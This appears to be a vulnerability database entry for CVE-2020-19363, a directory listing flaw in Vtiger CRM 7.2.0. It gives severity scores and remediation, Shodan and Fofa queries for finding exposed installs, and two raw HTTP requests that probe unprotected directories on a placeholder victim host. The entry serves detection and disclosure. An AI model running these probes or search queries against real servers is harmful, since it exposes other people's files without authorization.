🔙 목록으로 돌아가기

CVE-2020-19363: Vtiger CRM v7.2.0 - Directory Listing

TitleVtiger CRM v7.2.0 - Directory Listing
Author0x_Akoko
SeverityMedium
ImpactAttackers can access sensitive files and directory structures, potentially leading to information disclosure or further exploitation.
RemediationUpdate to the latest version of Vtiger CRM or apply security patches that enforce proper access controls.
CVSS Score5.3
EPSS Score0.0561
CVE IDCVE-2020-19363
CWE IDCWE-200
Shodan Queryhttp.html:"vtiger CRM"
Fofa Querybody="vtiger CRM"
Tags cve cve2020 vtiger listing exposure

🔍 Vulnerability Description

Vtiger CRM v7.2.0 contains a directory traversal vulnerability caused by improper access controls in /libraries and /layout directories, letting attackers display hidden files and list directories, exploit requires no authentication.

🌐 HTTP Request

GET /vtigercrm/libraries/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /vtigercrm/layouts/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-19363.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-19363.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A